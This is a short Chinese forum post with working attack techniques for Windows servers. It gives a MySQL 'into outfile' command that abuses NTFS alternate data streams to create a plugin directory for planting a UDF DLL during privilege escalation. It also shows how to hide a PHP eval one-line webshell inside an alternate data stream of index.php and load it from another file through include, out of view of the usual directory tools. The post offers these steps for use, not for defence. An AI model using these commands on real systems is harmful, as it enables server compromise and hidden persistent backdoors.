Win下MySQL提权时无法创建目录解决办法及数据流隐藏Webshell

2013-07-12 17:00:47 9 3204 4
这个其实是NTFS惹的祸。NTFS中的ADS(交换数据流)可以建立目录,隐藏webshell等等。

0x01 Mysql创建目录

当MySQL版本较高时,自定义函数的dll需要放在mysql目录下的lib\plugin\。一般普通的脚本是没有在这个文件夹下创建文件夹的权限的。这里可以用到ads来突破:
select 'xxx' into outfile 'D:\\mysql\\lib::$INDEX_ALLOCATION';
会在mysql目录下生成一个lib目录,这样你就可以将你的udf放在这个插件目录下了。   

0x02 隐藏webshell

在服务器上echo一个数据流文件进去,比如index.php是网页正常文件,我们可以这样子搞:
echo ^<?php @eval(request[xxx])?^>  > index.php:a.jpg
这样子就生成了一个不可见的shell a.jpg,常规的文件管理器、type命令,dir命令、del命令发现都找不出那个a.jpg的。我们可以在另外一个正常文件里把这个ADS文件include进去,<?php include(‘index.php:a.jpg’)?>,这样子就可以正常解析我们的一句话了。
其他ads的利用各位可以参考互联网。

关于作者

Mapconf15篇文章608篇回复

评论9次

要评论?请先  登录  或  注册